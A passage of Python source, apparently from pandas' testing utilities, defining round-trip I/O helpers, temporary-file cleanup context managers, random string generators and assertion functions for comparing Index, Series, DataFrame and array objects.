from pandas.io.formats.printing import pprint_thing
lzma = _import_lzma()
N = 30
K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(obj, path=None):
"""
Pickle an object and then read it again.
Parameters
----------
obj : pandas object
The object to pickle and then re-read.
path : str, default None
The path where the pickled object is written and then read.
Returns
-------
round_trip_pickled_object : pandas object
The original object that was pickled and then re-read.
"""
if path is None:
path = "__{random_bytes}__.pickle".format(random_bytes=rands(10))
with ensure_clean(path) as path:
pd.to_pickle(obj, path)
return pd.read_pickle(path)
def round_trip_pathlib(writer, reader, path=None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
round_trip_object : pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path=None):
"""
Write an object to file specified by a py.path LocalPath and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
round_trip_object : pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object
Parameters
----------
path : str
The path where the file is read from
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
f : file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = _get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
raise ValueError("ZIP file {} error. Only one file per ZIP.".format(path))
else:
msg = "Unrecognized compression type: {}".format(compression)
raise ValueError(msg)
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
import zipfile
compress_method = zipfile.ZipFile
elif compression == "gzip":
import gzip
compress_method = gzip.GzipFile
elif compression == "bz2":
import bz2
compress_method = bz2.BZ2File
elif compression == "xz":
compress_method = _get_lzma_file(lzma)
else:
msg = "Unrecognized compression type: {}".format(compression)
raise ValueError(msg)
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
args = (data,)
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def assert_almost_equal(
left, right, check_dtype="equiv", check_less_precise=False, **kwargs
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool / string {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
"""
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left,
right,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
**kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
err_msg = "{name} Expected type {exp_type}, found {act_type} instead"
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(left))
)
if not isinstance(right, cls):
raise AssertionError(
err_msg.format(name=cls_name, exp_type=cls, act_type=type(right))
)
def assert_dict_equal(left, right, compare_keys=True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p=0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""Generate an array of byte strings."""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""Generate an array of unicode strings."""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
if dtype is None:
return retval
else:
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def randu(nchars):
"""
Generate one random unicode string.
See `randu_array` if you want to create an array of random unicode strings.
"""
return "".join(np.random.choice(RANDU_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import get_fignums, close as _close
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False):
"""Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
"""
filename = filename or ""
fd = None
if return_filelike:
f = tempfile.TemporaryFile(suffix=filename)
try:
yield f
finally:
f.close()
else:
# don't generate tempfile if using a path with directory specified
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(suffix=filename)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(
"Couldn't close file descriptor: {fdesc} (file: {fname})".format(
fdesc=fd, fname=filename
)
)
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print("Exception on removing file: {error}".format(error=e))
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2):
"""Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = False,
check_exact: bool = True,
check_categorical: bool = True,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
if l.inferred_type in ("string", "unicode"):
assert r.inferred_type in ("string", "unicode")
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
labels = index.codes[level]
filled = take_1d(unique.values, labels, fill_value=unique._na_value)
values = unique._shallow_copy(filled, name=index.names[level])
return values
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = "{obj} levels are different".format(obj=obj)
msg2 = "{nlevels}, {left}".format(nlevels=left.nlevels, left=left)
msg3 = "{nlevels}, {right}".format(nlevels=right.nlevels, right=right)
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = "{obj} length are different".format(obj=obj)
msg2 = "{length}, {left}".format(length=len(left), left=left)
msg3 = "{length}, {right}".format(length=len(right), right=right)
raise_assert_detail(obj, msg1, msg2, msg3)
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = "MultiIndex level [{level}]".format(level=level)
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = "{obj} values are different ({pct} %)".format(
obj=obj, pct=np.round(diff, 5)
)
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left.values, right.values, obj="{obj} category".format(obj=obj)
)
def assert_class_equal(left, right, exact=True, obj="Input"):
"""checks classes are equal."""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return x.__class__.__name__
except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = "{obj} classes are not equivalent".format(obj=obj)
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = "{obj} classes are different".format(obj=obj)
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = 'Attribute "{attr}" are different'.format(attr=attr)
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, type "
"encountered {name!r}"
).format(name=el.__class__.__name__)
assert isinstance(el, (plt.Axes, dict)), msg
else:
assert isinstance(objs, (plt.Artist, tuple, dict)), (
"objs is neither an ndarray of Artist instances nor a "
'single Artist instance, tuple, or dict, "objs" is a {name!r}'.format(
name=objs.__class__.__name__
)
)
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(
left.categories, right.categories, obj="{obj}.categories".format(obj=obj)
)
assert_numpy_array_equal(
left.codes,
right.codes,
check_dtype=check_dtype,
obj="{obj}.codes".format(obj=obj),
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj="{obj}.categories".format(obj=obj),
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj="{obj}.values".format(obj=obj),
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(
left.left, right.left, exact=exact, obj="{obj}.left".format(obj=obj)
)
assert_index_equal(
left.right, right.right, exact=exact, obj="{obj}.left".format(obj=obj)
)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(
left._data, right._data, obj="{obj}.values".format(obj=obj)
)
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj="{obj}._data".format(obj=obj))
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = """{obj} are different
{message}
[left]: {left}
[right]: {right}""".format(
obj=obj, message=message, left=left, right=right
)
if diff is not None:
msg += "\n[diff]: {diff}".format(diff=diff)
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
""" Checks that 'np.ndarray' is equivalent
Parameters
----------
left : np.ndarray or iterable
right : np.ndarray or iterable
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype: bool, default True
check dtype if both a and b are np.ndarray
err_msg : str, default None
If provided, used as assertion message
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
msg = "{left!r} is not {right!r}".format(left=left_base, right=right_base)
raise AssertionError(msg)
elif check_same == "copy":
if left_base is right_base:
msg = "{left!r} is {right!r}".format(left=left_base, right=right_base)
raise AssertionError(msg)
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj,
"{obj} shapes are different".format(obj=obj),
left.shape,
right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = "{obj} values are different ({pct} %)".format(
obj=obj, pct=np.round(diff, 5)
)
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
# ToDo: There are some tests using rhs is sparse
# lhs is dense. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = "{len}, {left}".format(len=len(left), left=left.index)
msg2 = "{len}, {right}".format(len=len(right), right=right.index)
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.index".format(obj=obj),
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right)
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj="{obj}".format(obj=obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
"[datetimelike_compat=True] {left} is not equal to " "{right}."
).format(left=left.values, right=right.values)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj="{obj}".format(obj=obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(
left.values, right.values, obj="{obj} category".format(obj=obj)
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool / string {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool / string {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical, i.e.
* left.index.names == right.index.names
* left.columns.names == right.columns.names
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas.util.testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
AssertionError: Attributes are different
...
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj,
"{obj} shape mismatch".format(obj=obj),
"{shape!r}".format(shape=left.shape),
"{shape!r}".format(shape=right.shape),
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.index".format(obj=obj),
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj="{obj}.columns".format(obj=obj),
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj="{obj}.iloc[:, {idx}]".format(obj=obj, idx=i),
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left : Index, Series, DataFrame, ExtensionArray, or np.ndarray
right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
**kwargs
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
